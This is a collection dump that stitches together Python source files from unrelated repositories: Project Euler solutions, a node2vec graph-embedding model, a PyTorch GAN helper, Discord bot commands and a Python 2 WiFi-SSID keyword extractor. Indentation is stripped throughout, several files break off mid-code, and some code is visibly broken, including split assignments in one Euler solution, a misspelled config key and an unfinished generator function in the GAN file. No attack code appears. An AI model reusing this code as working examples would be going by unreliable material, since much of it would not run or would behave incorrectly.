grid = [[0 for y in range(GRID_SIZE)] for x in range(GRID_SIZE)]
# initialize the top and left borders with 1 everywhere
for i in range(GRID_SIZE):
grid [i][0] = 1
grid [0][i] = 1
# for each grid cell
for y in range(1, GRID_SIZE):
for x in range(1, GRID_SIZE):
# this grid is equal to the sum of the one above it, and the one to
# its left
grid [y][x] = grid [y - 1][x] + grid [y][x - 1]
# return the value of the last grid
return grid [GRID_SIZE - 1][GRID_SIZE - 1]
```
#### File: project-euler/problems/017.py
```python
import re
MAX = 1000
def euler():
# accumulator for the number of letters used
accumulator = 0
# for each number in the given range
for number in range(1, MAX + 1):
# get the number's name
name = number_name(number)
# remove the whitespace and dashes
name = re.sub('\\s|-', '', name)
# add the length of the anme to the number of letters used
accumulator += len(name)
# return the number of letters used
return accumulator
# used for direct access to some number names
number_name_dictionary = {
0: 'zero',
1: 'one',
2: 'two',
3: 'three',
4: 'four',
5: 'five',
6: 'six',
7: 'seven',
8: 'eight',
9: 'nine',
10: 'ten',
11: 'eleven',
12: 'twelve',
13: 'thirteen',
15: 'fifteen',
18: 'eighteen',
20: 'twenty',
30: 'thirty',
40: 'forty',
50: 'fifty',
80: 'eighty',
1000: 'one thousand'
}
def number_name(number):
"""Return the full name, in letters, of a given number.
Args:
number: number whose name should be returned.
Returns:
the full name of that number (twenty-three, one hundred and two...), as
a string.
Raises:
ValueError: if number is not between 0 and 1000.
"""
if not isinstance(number, int):
raise TypeError("number is not an integer")
elif number < 0 or number > 1000:
raise ValueError("number out of range (must be between 0 and 1000)")
elif number in number_name_dictionary:
# return directly if it's simply a dictionary lookup -- used for
# exceptions and small numbers
return number_name_dictionary [number]
elif number > 10 and number < 20:
# sixteen, nineteen...
return number_name_dictionary [number - 10] + 'teen'
elif number >= 20 and number < 100:
# twenty-three, forty-nine...
if number // 10 * 10 in number_name_dictionary:
# exceptions for the tens: twenty, forty, fifty...
name = number_name_dictionary [number // 10 * 10]
else:
# regular tens: sixty, seventy...
name = number_name(number // 10) + 'ty'
if number % 10:
# if has a non-zero unit, add a dash, then the name of the units
# (twenty-three, ninety-eight...)
name += '-' + number_name(number % 10)
return name
elif number >= 100 and number < 1000:
# nine hundred, two hundred...
name = number_name(number // 100) + ' hundred'
# if has tens or units
if number % 100:
# add 'and ...', as in four hundred and ninety-eight
name += ' and ' + number_name(number % 100)
return name
```
#### File: project-euler/problems/021.py
```python
import helpers.prime as prime
MAX = 10000
def euler():
# accumulator for the sum
accumulator = 0
# for each value of a in the given range
for a in range(1, MAX):
# calculate the b
b = d(a)
# if a and b are amicable
if b != 0 and d(b) == a and a < b:
# add them to the sum
accumulator += b + a
# return the sum accumulator
return accumulator
def d(number):
"""Return the sum of the divisors of a given number.
Divisors exclude the number itself, i.e.:
d(2) = 1 = 1
d(4) = 1 + 2 = 3
d(6) = 1 + 2 + 3 = 6
"""
return sum(prime.divisors(number)) - number
```
#### File: project-euler/problems/023.py
```python
# Find the sum of all the positive integers which cannot be written as the sum
# of two abundant numbers.
MAX = 28123
def euler():
abundants = {}
for number in range(1, MAX):
if is_abundant(number):
abundants [number] = True
accumulator = 0
for number in range(1, MAX):
is_a_sum = False
for abundant in abundants:
if (number - abundant) in abundants:
is_a_sum = True
break
if not is_a_sum:
accumulator += number
return accumulator
def list_of_abundants(highest_value):
"""Return the list of abundant numbers from 1 to the given number."""
abundant_list = []
for number in range(1, highest_value):
if is_abundant(number):
abundant_list.append(number)
return abundant_list
def sum_of_divisors(number):
"""Return the sum of the divisors of a given number."""
product = 1
divisor = 2
while divisor * divisor <= number:
multiplicand = 1
while number % divisor == 0:
multiplicand = multiplicand * divisor + 1
number //= divisor
product *= multiplicand
divisor += 1
if number > 1:
product *= 1 + number
return product
def is_abundant(number):
"""Return True iff the given number is abundant.
A number is abundant iff the sum of its divisors is higher than itself.
"""
return sum_of_divisors(number) > number + number
```
#### File: project-euler/problems/026.py
```python
MAX = 1000
def euler():
# longest length for a cycle
longest_cycle_length = 0
# divisor that generates that cycle length
longest_cycle_divisor = 0
# for each divisor
for divisor in range(2, MAX):
# calculate the length of the fraction's cycle
cycle_length = fraction_cycle_length(divisor)
# if it's higher than any value seen before
if cycle_length > longest_cycle_length:
# keep in memory the cycle length, and which divisor generates it
longest_cycle_length = cycle_length
longest_cycle_divisor = divisor
# return the divisor that generates the longest cycle
return longest_cycle_divisor
def fraction_cycle_length(denominator):
"""Return the number of digits in the cycle part of a fraction.
For instance, in 1/3 (0.3333...), '3' is the recurring cycle. The length of
that cycle is 1.
In 1/7 (0.142857142857142...), '142857' is the recuring cycle. The length of
the cycle is 6.
"""
# counter for the number of digits generated
digit_count = 0
# accumulator for the current number to be divided
accumulator = 1
# values encountered for the accumulator
accumulators = []
# while there is a remainder to the division
while accumulator != 0:
# if the current accumulator can be divided by the denominator
if accumulator >= denominator:
# the digit to add to the number is the result of that division
digit = accumulator // denominator
# if we have never had that accumulator before
if not accumulator in accumulators:
accumulators.append(accumulator)
else:
# if we have already met that accumulator before, return the
# number of digits between two occurences
return digit_count - accumulators.index(accumulator)
# subtract the result of the division from the accumulator
accumulator -= digit * denominator
# add a digit to the digit count
digit_count += 1
else:
# the current accumulator cannot be divided by the denominator,
# multiply it by 10
accumulator *= 10
# divides evenly, 0 cycle length
return 0
```
#### File: project-euler/problems/030.py
```python
POWER = 5
def euler():
accumulator = 0
for number in range(2, POWER * 9 ** POWER + 1):
if is_sum_of_power_digits(number, POWER):
accumulator += number
return accumulator
def is_sum_of_power_digits(number, power):
starting_number = number
accumulator = 0
while number > 0:
digit = number % 10
accumulator += digit ** power
number //= 10
return accumulator == starting_number
```
#### File: project-euler/problems/032.py
```python
import helpers.sequence as sequence
def euler():
products_cache = {}
accumulator = 0
for permutation in sequence.permutations('123456789'):
permutation = ''.join(permutation)
products = valid_products(permutation)
for product in products:
if not product in products_cache:
accumulator += product
products_cache [product] = True
return accumulator
def valid_products(permutation):
products = []
for split_1 in range(1, 5):
for split_2 in(5 - split_1, 4 - split_1):
if split_2 > 0:
split_2 += split_1
multiplicand = int(permutation [: split_1])
multiplier = int(permutation [split_1 : split_2])
product = int(permutation [split_2 :])
if multiplicand * multiplier == product:
products.append(product)
return products
```
#### File: project-euler/problems/033.py
```python
import fractions
def euler():
accumulator = fractions.Fraction(1, 1)
for digit_1 in range(1, 10):
for digit_2 in range(1, 10):
for digit_3 in range(1, 10):
if digit_1 != digit_2 or digit_1 != digit_3:
numerator = digit_1 * 10 + digit_2
denominator = digit_2 * 10 + digit_3
original_fraction =
fractions.Fraction(numerator, denominator)
numerator = digit_1
denominator = digit_3
reduced_fraction =
fractions.Fraction(numerator, denominator)
if original_fraction == reduced_fraction:
accumulator *= original_fraction
return accumulator.denominator
```
#### File: project-euler/problems/040.py
```python
import math
MAX = 1000000
def euler():
# calculate what the last needed number is
last_number = 0
size = 0
while size < MAX:
last_number += 1
size += int(math.log(MAX, 10))
# construct the string
string = ''.join(str(number) for number in range(1, MAX + 1))
# get the characters needed for calculations
digits = [string [i] for i in [0, 9, 99, 999, 9999, 99999, 999999]]
# calculate product of these digits
accumulator = 1
for digit in digits:
accumulator *= int(digit)
# return the product
return accumulator
```
#### File: project-euler/problems/042.py
```python
import helpers.file as fileutils
# arbitrary value for the highest reachable triangle number
MAX = 1000
def euler():
# set of the triangle numbers until an arbitrary maximum number
triangles = set()
# generate triangle numbers
n = 1
highest_triangle = 0
while highest_triangle < MAX:
highest_triangle = n * (n + 1) // 2
triangles.add(highest_triangle)
n += 1
# read the words and put them into a list of strings
words = fileutils.flattened_list_from_file('data/042.txt',
separator = ',', convert_to = str)
# strip the quote-sign from the strings, leaving only the word
words = [word.replace('"', '') for word in words]
# accumulator for the final answer, the number of triangle words
triangle_word_count = 0
# count the number of triangle words
for word in words:
if word_to_int(word) in triangles:
triangle_word_count += 1
# return it
return triangle_word_count
def word_to_int(word):
"""Returns the sum of the 'letter value' of each letter in the word.
('a' = 1, 'b' = 2, 'c' = 3, ...)"""
return sum(ord(letter) - ord('a') + 1 for letter in word.lower())
```
#### File: project-euler/problems/051.py
```python
import helpers.prime as prime
# number of replacements of digits that have to work
FAMILY_SIZE = 8
def euler():
# for each "starting" prime number
for prime_number in prime.primes(200000):
# list of integers for each digit
prime_number_digits = list(int(digit) for digit in str(prime_number))
# set (without duplicates) of the digits in the prime number
prime_number_digit_set = set(prime_number_digits)
# for each digit that could be replaced in the prime number
for base_digit in prime_number_digit_set:
# number of digit replacements that are actual prime numbers
prime_count = 0
# never replace the first digit with a zero
replacements = range(10) if prime_number_digits[0] != base_digit \
else range(1, 10)
# for each possible digit replacement
for replacement_digit in replacements:
# replace the digit base_digit with replacement_digit
modified_digits = replace(prime_number_digits, base_digit,
replacement_digit)
# convert that list to a number
modified_number = int(''.join(str(digit) \
for digit in modified_digits))
# if it's a prime, increment the prime count (duh)
if prime.is_prime(modified_number):
prime_count += 1
# return if the answer if we found it
if prime_count == FAMILY_SIZE:
return prime_number
def replace(xs, base, replacement):
"""Replaces every 'base' in 'xs' with 'replacement'. Non destructive.
Args:
xs: Initial list of elements.
base: Element to be replaced in the new list.
replacement: Element to replace that value with.
Returns:
A new list with the replacement applied."""
return [x if x != base else replacement for x in xs]
```
#### File: project-euler/problems/056.py
```python
MAX = 100
def euler():
highest_sum = 0
for a in range(1, MAX):
for b in range(1, MAX):
highest_sum = max(highest_sum, sum([int(c) for c in str(a ** b)]))
return highest_sum
```
#### File: project-euler/problems/061.py
```python
from math import sqrt
def euler():
# functions used to check the type of a number
predicates = [is_triangle, is_square, is_pentagonal, is_hexagonal,
is_heptagonal, is_octagonal]
for left in range(10, 100):
# try to construct a chain from this initial left-part for the number
c = chain([], left, predicates)
# if it worked, return the sum
if c:
return sum(c)
def chain(xs, left, predicates):
# `xs` is the constructed list
# `left` is the left part of the current number
# `predicates` is the list of predicates that aren't already verified by
# numbers in `xs`
if predicates == []:
# `xs` has the right number of elements, return it
return xs
rights = range(10, 100)
if len(predicates) == 1:
# if there is only one number left to guess, the right part of this
# number must be the left part of the first number
rights = [int(xs[0] / 100)]
for right in rights:
# construct the current number as "${left}${right}"
n = left * 100 + right
# no duplicates in `xs`
if n in xs:
continue
# check each predicate on the constructed number (n)
for predicate in predicates:
if predicate(n):
# remove the verified predicate from the list of predicates
new_predicates = list(predicates)
new_predicates.remove(predicate)
# try to advance recursively
c = chain(xs + [n], right, new_predicates)
# if it worked, return the returned value
if c:
return c
# failed to construct it
return None
def is_triangle(k):
n1 = (-1 + sqrt(1 + 8 * k)) / 2
return int(n1) == n1# or int(n2) == n2
def is_square(k):
return int(sqrt(k)) == sqrt(k)
def is_pentagonal(k):
n1 = (1 + sqrt(1 + 24 * k)) / 6
return int(n1) == n1# or int(n2) == n2
def is_hexagonal(k):
n1 = (0.5 + sqrt(0.25 + 2 * k)) / 2
return int(n1) == n1# or int(n2) == n2
def is_heptagonal(k):
n1 = (3 + sqrt(9 + 40 * k)) / 10
return int(n1) == n1# or int(n2) == n2
def is_octagonal(k):
n1 = (2 + sqrt(4 + 12 * k)) / 6
return int(n1) == n1# or int(n2) == n2
```
#### File: project-euler/problems/071.py
```python
HIGHEST_D = 10 ** 6
def euler():
m = 0
best_match = (2 / 7, None)
for d in range(2, HIGHEST_D):
if d % 7 != 0:
m += 1
n = m // 2
if n / d > best_match[0]:
best_match = (n / d, n)
return best_match[1]
```
#### File: project-euler/problems/072.py
```python
def euler():
MAX = 10 ** 6
# at the end, this table will contain all the values for totients
table = list(range(MAX + 1))
match_count = 0
# there are totient(p) reduced fracions for each denominator p
for p in range(2, MAX + 1):
if table[p] == p:
# this number is prime: multiply each of is multiples by (1 - 1 / p)
for q in range(p, MAX + 1, p):
table[q] *= 1 - 1 / p
# add totient(p) to the number of matches
match_count += table[p]
# return the number of matches, as an integer
return round(match_count)
```
#### File: project-euler/problems/073.py
```python
import helpers.prime as prime
import math
DELTA = 0.0001
MAX = 12000
def euler():
# number of fractions found
match_count = 0
# for each possible numerator n
for n in range(2, math.ceil(MAX / 2) + 1):
# lowest possible denominator for a fraction in the wanted range
start = math.ceil(2 * n + DELTA)
# highest possible denominator for a fraction in the wanted range
end = min(MAX, int(3 * n - DELTA))
# construct a dictionary whose keys are all the denominators that
# do *not* make a reduced fraction with the numerator n
table = dict()
for p in prime.prime_factors(n):
for q in range(p, end + 1, p):
table[q] = True
# for each denominator d
for d in range(start, end + 1):
# if n / d is a reduced fraction
if not d in table:
match_count += 1
# return the number of fractions found
return match_count
```
#### File: project-euler/problems/075.py
```python
import helpers.discreet as discreet
LIMIT = 1500000
def euler():
table = {}
m = 2
while 2 * m * m < LIMIT:
for n in range(1, m):
if (m - n) % 2 == 1 and discreet.gcd(m, n) == 1:
a = m * m - n * n
b = 2 * m * n
c = m * m + n * n
l = a + b + c
for L in range(l, LIMIT, l):
if L in table:
table[L] += 1
else:
table[L] = 1
m += 1
match_count = 0
for k in table:
if table[k] == 1:
match_count += 1
return match_count
```
#### File: project-euler/problems/078.py
```python
DIVISOR = 1000000
def euler():
n = 2
# this is valid since partition(n) returns a value with a modulo applied
while partition(n) != 0:
n += 1
return n
# list of partitions, used by partition(), and indirectly by next_p
ps = [0, 1]
# partition function; see Euler's pentagonal number theorem
#
# N.B.: all calculations are made with modulo DIVISOR
def partition(n):
n += 1
i = len(ps)
while i <= n:
ps.append(next_p(i, ps) % DIVISOR)
i += 1
return ps[n]
# helper function for partition(): calculate the next partition
#
# N.B.: all calculations are made with modulo DIVISOR
def next_p(n, ps):
acc = 0
for dk in (-1, 1):
k = dk
q = pentagonal(k)
while q < n:
acc += int(((-1) ** (k - 1)) * ps[n - q])
k += dk
q = pentagonal(k)
return acc % DIVISOR
# helper function for partition(): calculate the k-th pentagonal number
#
# N.B.: all calculations are made with modulo DIVISOR
def pentagonal(k):
return int(k * (3 * k - 1) / 2) % DIVISOR
```
#### File: project-euler/problems/080.py
```python
MAX = 100
# uses the algorithm for digit-by-digit calculation, as described on Wikipedia:
# http://en.wikipedia.org/wiki/Methods_of_computing_square_roots#Digit-by-digit_calculation
def euler():
acc = 0
# for each starting number
for c in range(2, MAX):
acc += square_root_digit_sum(c)
return acc
# return the sum of the first 100 digits in the irrational square root sqrt(c)
#
# if sqrt(c) is rational, returns 0
def square_root_digit_sum(c):
# number representing the digits of the root
p = 0
i = 0
# True iff the root is rational
rational = False
# for each of the first 100 digits
while i < 100:
i += 1
# calculate the current value for x and y
x = guess_x(p, c)
y = x * (20 * p + x)
# add x as a digit to p
p = 10 * p + x
# subtract y from c, and move it two digits to the left
c -= y
c *= 100
# if c is 0, it is rational; just return 0
if c == 0:
return 0
# return the sum of the digits found
return sum(int(d) for d in str(p))
# helper function for calculating the next digit of the square root
def guess_x(p, c):
# guess the value of x by "brute force"
# x is the highest integer that satisfies x(20p + x) <= c, and is going to be
# the next digit to add to the square root
x = 1
while x * (20 * p + x) <= c:
x += 1
return x - 1
```
#### File: project-euler/problems/085.py
```python
MAX = 2000
# the "target" we are trying to reach
TARGET = 2000000
def euler():
# (area, difference) tuple for the best match
best_match = (0, 2000000)
# for each possible width/height
for height in range(1, MAX + 1):
for width in range(1, height + 1):
# the number of sub-rectangles is t(w)*t(h)
rectangles = triangular(height) * triangular(width)
# if it is closer to TARGET than previous best match, this is the
# new best match
if abs(TARGET - rectangles) < best_match[1]:
best_match = (height * width, abs(TARGET - rectangles))
# return the area for the best match
return best_match[0]
# return the nth triangular number
def triangular(n):
return n * (n + 1) // 2
``` |
{
"source": "612twilight/CogDL-TensorFlow",
"score": 2
} |
#### File: models/emb/node2vec.py
```python
import numpy as np
import networkx as nx
from gensim.models import Word2Vec, KeyedVectors
import random
import time
from .. import base_model, register_model, alias_draw, alias_setup
@register_model("node2vec")
class Node2vec(base_model.BaseModel):
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
# fmt: off
parser.add_argument('--walk-length', type=int, default=80,
help='Length of walk per source. Default is 80.')
parser.add_argument('--walk-num', type=int, default=40,
help='Number of walks per source. Default is 40.')
parser.add_argument('--window-size', type=int, default=5,
help='Window size of skip-gram model. Default is 5.')
parser.add_argument('--worker', type=int, default=10,
help='Number of parallel workers. Default is 10.')
parser.add_argument('--iteration', type=int, default=10,
help='Number of iterations. Default is 10.')
parser.add_argument('--p_value', type=float, default=1.0,
help='Parameter in node2vec. Default is 1.0.')
# use p_value instead of p to avoid conflict with argument patience, since the abbr of patience is p
parser.add_argument('--q_value', type=float, default=1.0,
help='Parameter in node2vec. Default is 1.0.')
# fmt: on
@classmethod
def build_model_from_args(cls, args):
return cls(
args.hidden_size,
args.walk_length,
args.walk_num,
args.window_size,
args.worker,
args.iteration,
args.p_value,
args.q_value,
)
def __init__(
self, dimension, walk_length, walk_num, window_size, worker, iteration, p, q
):
super(Node2vec, self).__init__()
self.dimension = dimension
self.walk_length = walk_length
self.walk_num = walk_num
self.window_size = window_size
self.worker = worker
self.iteration = iteration
self.p = p
self.q = q
def train(self, G):
self.G = G
is_directed = nx.is_directed(self.G)
for i, j in G.edges():
G[i][j]["weight"] = G[i][j].get("weight", 1.0)
if not is_directed:
G[j][i]["weight"] = G[j][i].get("weight", 1.0)
self._preprocess_transition_probs()
walks = self._simulate_walks(self.walk_num, self.walk_length)
walks = [[str(node) for node in walk] for walk in walks]
model = Word2Vec(
walks,
size=self.dimension,
window=self.window_size,
min_count=0,
sg=1,
workers=self.worker,
iter=self.iteration,
)
id2node = dict([(vid, node) for vid, node in enumerate(G.nodes())])
self.embeddings = np.asarray(
[model[str(id2node[i])] for i in range(len(id2node))]
)
return self.embeddings
def _node2vec_walk(self, walk_length, start_node):
# Simulate a random walk starting from start node.
G = self.G
alias_nodes = self.alias_nodes
alias_edges = self.alias_edges
walk = [start_node]
while len(walk) < walk_length:
cur = walk[-1]
cur_nbrs = list(G.neighbors(cur))
if len(cur_nbrs) > 0:
if len(walk) == 1:
walk.append(
cur_nbrs[alias_draw(alias_nodes[cur][0], alias_nodes[cur][1])]
)
else:
prev = walk[-2]
next = cur_nbrs[
alias_draw(
alias_edges[(prev, cur)][0], alias_edges[(prev, cur)][1]
)
]
walk.append(next)
else:
break
return walk
def _simulate_walks(self, num_walks, walk_length):
# Repeatedly simulate random walks from each node.
G = self.G
walks = []
nodes = list(G.nodes())
print("Walk iteration:")
for walk_iter in range(num_walks):
if walk_iter % 10 == 0:
print(str(walk_iter + 1), "/", str(num_walks))
random.shuffle(nodes)
for node in nodes:
walks.append(
self._node2vec_walk(walk_length=walk_length, start_node=node)
)
return walks
def _get_alias_edge(self, src, dst):
# Get the alias edge setup lists for a given edge.
G = self.G
unnormalized_probs = []
for dst_nbr in G.neighbors(dst):
if dst_nbr == src:
unnormalized_probs.append(G[dst][dst_nbr]["weight"] / self.p)
elif G.has_edge(dst_nbr, src):
unnormalized_probs.append(G[dst][dst_nbr]["weight"])
else:
unnormalized_probs.append(G[dst][dst_nbr]["weight"] / self.q)
norm_const = sum(unnormalized_probs)
normalized_probs = [float(u_prob) / norm_const for u_prob in unnormalized_probs]
return alias_setup(normalized_probs)
def _preprocess_transition_probs(self):
# Preprocessing of transition probabilities for guiding the random walks.
G = self.G
is_directed = nx.is_directed(self.G)
print(len(list(G.nodes())))
print(len(list(G.edges())))
s = time.time()
alias_nodes = {}
for node in G.nodes():
unnormalized_probs = [G[node][nbr]["weight"] for nbr in G.neighbors(node)]
norm_const = sum(unnormalized_probs)
normalized_probs = [
float(u_prob) / norm_const for u_prob in unnormalized_probs
]
alias_nodes[node] = alias_setup(normalized_probs)
t = time.time()
print("alias_nodes", t - s)
alias_edges = {}
s = time.time()
if is_directed:
for edge in G.edges():
alias_edges[edge] = self._get_alias_edge(edge[0], edge[1])
else:
for edge in G.edges():
alias_edges[edge] = self._get_alias_edge(edge[0], edge[1])
alias_edges[(edge[1], edge[0])] = self._get_alias_edge(edge[1], edge[0])
t = time.time()
print("alias_edges", t - s)
self.alias_nodes = alias_nodes
self.alias_edges = alias_edges
return
```
#### File: CogDL-TensorFlow/tests/test_line.py
```python
import os
import sys
sys.path.append('../')
def test_line():
os.system("python ../scripts/train.py --task unsupervised_node_classification --dataset wikipedia --model line --seed 0 1 2 3 4")
pass
if __name__ == "__main__":
test_line()
``` |
{
"source": "6148Authours/MOC",
"score": 2
} |
#### File: src/utils/gan.py
```python
import copy
import torch
import torch.nn as nn
import torch.functional as F
import numpy as np
# Here we use a function to avoid reuse of objects
DEFAULT_GAN_CONFIGS = lambda: {
'batch_size': 64,
'generator_output_activation': 'tanh',
'generator_hidden_activation': 'relu',
'discriminator_hidden_activation': 'leaky_relu',
'generator_optimizer': torch.optim.RMSprop,
'discriminator_optimizer': torch.optim.RMSprop,
'generator_weight_initializer': nn.init.xavier_normal_,
'discriminator_weight_initializer': nn.init.xavier_normal_,
'print_iteration': 50,
'reset_generator_optimizer': False,
'reset_discriminator_optimizer': False,
'batch_normalize_discriminator': False,
'batch_normalize_generator': False,
'supress_all_logging': False,
'default_generator_iters': 1, # It is highly recommend to not change these parameters
'default_discriminator_iters': 1,
'gan_type': 'lsgan',
'wgan_gradient_penalty': 0.1,
}
class Generator(nn.Module):
def __init__(self, output_size, hidden_layers, noise_size, configs):
super(Generator, self).__init__()
self.configs = configs
self.layers = nn.ModuleList()
self.batch_norm = configs['batch_normalize_generator']
previous_size = noise_size
for size in hidden_layers:
self.layers.append(nn.Linear(previous_size, size))
if configs['generator_hidden_actiovation'] == 'relu':
self.layers.append(nn.ReLU())
elif configs['generator_hidden_actiovation'] == 'leaky_relu':
self.layers.append(nn.LeakyReLU(0.2))
else:
raise ValueError('Unsupported activation type')
previous_size = size
self.layers.append(nn.Linear(previous_size, output_size))
if configs['generator_hidden_actiovation'] == 'tanh':
self.layers.append(nn.Tanh())
elif configs['generator_hidden_actiovation'] == 'sigmoid':
self.layers.append(nn.Sigmoid())
else:
raise ValueError('Unsupported activation type!')
def forward(self, x):
for layer in self.layers:
x = layer(x)
if self.batch_norm:
x = nn.BatchNorm1d(x)
return x
class DiscriminatorNet(nn.Module):
def __init__(self, input_size, hidden_layers, output_size, configs):
super(DiscriminatorNet, self).__init__()
previous_size = input_size
self.layers = nn.ModuleList()
for size in hidden_layers:
self.layers.append(nn.Linear(previous_size, size))
if configs['generator_hidden_actiovation'] == 'relu':
self.layers.append(nn.ReLU())
elif configs['generator_hidden_actiovation'] == 'leaky_relu':
self.layers.append(nn.LeakyReLU(0.2))
else:
raise ValueError('Unsupported activation type')
previous_size = size
self.layers.append(nn.Linear(previous_size, output_size))
def forward(self, x):
for layer in self.layers:
x = layer(x)
if self.batch_norm:
x = nn.BatchNorm1d(x)
return x
class Discriminator(nn.Module):
def __init__(self, generator_output, input_size, hidden_layers, output_size, configs):
super(Discriminator, self).__init__()
self._generator_input = generator_output
self.configs = configs
self.sample_discriminator = DiscriminatorNet(input_size, hidden_layers, output_size, configs)
self.generator_discriminator = DiscriminatorNet(input_size, hidden_layers, output_size, configs)
def forward(self, x):
return self.sample_discriminator(x), self.generator_discriminator(x)
def batch_feed_array(array, batch_size):
data_size = array.shape[0]
if data_size <= batch_size:
while True:
yield array
else:
start = 0
while True:
if start + batch_size < data_size:
yield array
class FCGAN(object):
def __init__(self, generator_output_size, discriminator_output_size, generator_layers, discriminator_layers,
noise_size, configs=None):
self.generator_output_size = generator_output_size
self.discriminator_output_size = discriminator_output_size
self.noise_size = noise_size
self.configs = copy.deepcopy(DEFAULT_GAN_CONFIGS)
if configs is not None:
self.configs.update(configs)
self.generator = Generator(generator_output_size, generator_layers, noise_size, self.configs)
self.discriminator = Discriminator(self.generator.output, generator_output_size, discriminator_layers,
discriminator_output_size, self.configs)
self.generator_train_op = self.configs['generator_optimizer'](self.generator.parameters())
self.discriminator_train_op = self.configs['discriminator_optimizer'](self.discriminator.parameters())
def sample_random_noise(self, size):
return np.random.randn(size, self.noise_size)
def sample_generator(self, size):
generator_samples = []
generator_noise = []
batch_size = self.configs['batch_size']
for i in range(0, size, batch_size):
sample_size = min(batch_size, size - i)
noise = self.sample_random_noise(sample_size)
generator_noise.append(noise)
# Todo: this part is incorrect
generator_samples.append(self.generator.output, self.generator.input)
return np.vstack(generator_samples), np.vstack(generator_noise)
def train(self, X, Y, outer_iers, generator_iters=None, discriminator_iters=None):
if generator_iters is None:
generator_iters = self.configs['default_generator_iters']
if discriminator_iters is None:
discriminator_iters = self.configs['default_discriminator_iters']
sample_size = X.shape[0]
train_size = sample_size
batch_size = self.configs['batch_size']
generated_Y = np.zeros((batch_size, self.discriminator_output_size))
batch_feed_X = batch
``` |
{
"source": "615/VulnPoC",
"score": 3
} |
#### File: VulnPoC/lib/common.py
```python
import os,sys
import urllib,urllib2
import re
import urlparse,random
from settings import Banner
sys.dont_write_bytecode = True
def dataStdout(date):
message = date
sys.stdout.write(message)
def banner():
print random.randint(0,2)
_ = Banner[random.randint(0,2)]
dataStdout(_)
``` |
{
"source": "6180/foxybot",
"score": 3
} |
#### File: foxybot/commands/xkcd.py
```python
import aiohttp
import requests
from discord import Embed
from command import AbstractCommand, bot_command
@bot_command
class Xkcd(AbstractCommand):
_aliases = ['xkcd']
async def execute(self, shards, client, msg):
# TODO: allow specifying a numbered comic or search term to retrieve
async with aiohttp.ClientSession() as session:
async with session.get('http://c.xkcd.com/random/comic/') as resp:
url = resp.url
async with session.get(f'{url}/info.0.json') as resp:
comic = await resp.json()
embed = Embed()
embed.colour = 0x6699FF
embed.set_author(name=comic['title'], url=f"https://xkcd.com/{comic['num']}/")
embed.set_image(url=comic['img'])
embed.set_footer(text=comic['alt'])
await msg.channel.send(embed=embed)
@property
def aliases(self):
return self._aliases
``` |
{
"source": "6180/ranger-bot",
"score": 3
} |
#### File: ranger/commands/_template_command.py
```python
class Command():
# List of the handles this command is onvokable with.
_aliases = [
"main_name",
"another_name"
]
# Text to show in the bot help dialog.
_help = "This is what this command does: stuff!"
# If `False` anyone can use this command. If `True` only people with the
# `administrator` privilege can use it.
_privileged = True
# If `True` only the bot owner can use the command.
_op_priv = False
# Argument parser for complex commands
parser = None
@staticmethod
async def execute(client, msg):
await msg.channel.send(msg.content)
``` |
{
"source": "619561504/python-study",
"score": 3
} |
#### File: 619561504/python-study/wifi_key.py
```python
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import operator
#搜索两个字符串里的最长连续子串,返回最长子串及其长度
def find_lccs_substr(s1, s2):
m=[[0 for i in range(len(s2)+1)] for j in range(len(s1)+1)] #生成0矩阵,为方便后续计算,比字符串长度多了一列
mmax=0 #最长匹配的长度
p=0 #最长匹配对应在s1中的最后一位
for i in range(len(s1)):
for j in range(len(s2)):
if s1[i]==s2[j]:
m[i+1][j+1]=m[i][j]+1
if m[i+1][j+1]>mmax:
mmax=m[i+1][j+1]
p=i+1
if s1:
return s1[p-mmax:p].decode('utf-8')#,mmax #返回最长子串及其长度
#取出topN value的key的list
def find_topN_value_key(dictA,topn):
list_N =[]
if dictA:
for i in range(0,topn):
max_value_key = max(dictA.iteritems(), key=operator.itemgetter(1))[0]
list_N.append(max_value_key)
dictA.pop(max_value_key) #删除最大的key,value,方便下一次循环
if not dictA:
break
return list_N
#抽取一个dict的ssid中的key_string
def extract_keywords(dict_ssid,topn): #list_ssid is a dict like {ssid1:cnt1,ssid2:cnt2,……}
# length = len(list_ssid)
# dict_key_cnt = {} #{key1:cnt1,key2:cnt2,……}
# for i in range(0,length-1): #1->2,2->3,n-1->n
# for j in range(i+1,length):
# lscc_result = find_lccs_substr(list_ssid[i],list_ssid[j])
# key_ssid = lscc_result[0] #最长连续子串
# #key_length = lscc_result[1] #最长连续资产的长度
# if len(key_ssid)>2:
# if key_ssid in dict_key_cnt.keys():
# dict_key_cnt[key_ssid] = dict_key_cnt[key_ssid] + 1
# else :
# dict_key_cnt[key_ssid] = 1
list_ssid = dict_ssid.keys() #取出某shop的所有ssid list
length = len(list_ssid)
dict_key_cnt = {} #{key1:cnt1,key2:cnt2,……}
for i in range(0,length-1): #1->2,2->3,n-1->n
for j in range(i+1,length):
lscc_result = find_lccs_substr(list_ssid[i],list_ssid[j])
if lscc_result:
key_ssid = lscc_result[0] #最长连续子串
#key_length = lscc_result[1] #最长连续资产的长度
if len(key_ssid)>2:
if key_ssid in dict_key_cnt.keys():
m = dict_ssid[list_ssid[i]]
n = dict_ssid[list_ssid[j]]
dict_key_cnt[key_ssid] = int(dict_key_cnt[key_ssid]) + int(m) + int(n)
else :
m = dict_ssid[list_ssid[i]]
n = dict_ssid[list_ssid[j]]
dict_key_cnt[key_ssid] = int(m)+int(n)
#输出dict {string1:cnt1,string2:cnt2,……}
# print 'output dict_key_cnt:'
# for key, value in dict_key_cnt.iteritems():
# print key,value
list_keys = find_topN_value_key(dict_key_cnt,topn)
return list_keys
#抽取不同shop的key_string里频率高的string
def find_unused_fre_key(dict_key):
list_fre = []
for key,value in dict_key.items():
for i in range(len(value)):
list_fre.append(value[i])
a = {}
list_fre_key = []
for i in list_fre:
if list_fre.count(i)>1:
a[i] = list_fre.count(i)
for key,value in a.items():
list_fre_key.append(key)
print(list_fre_key)
return list_fre_key
#过滤list成员,求差集,在B中但不在A中
def diff(listA,listB):
retD = list(set(listB).difference(set(listA)))
return retD
#常见路由器等无意义词
list_unused = ['TP-LINK','MERCURY','FAST','Tenda','Xiaomi','PHICOMM','D-Link','TPGuest','dlink','ChinaNet','CMCC','CU','B-LINK','USER','360WiFi',
'客厅的父母乐','GAOKE','0x','dlink','netcore','netgear','androidap','d-link_dir-612','@ffan']
if __name__ == '__main__':
DB_FN = 'F:\\wifi3.txt'
with open(DB_FN, 'r') as f:
data = f.readlines()
dict_shop_ssid = {}
for line in data:
l = line.strip().split('|')
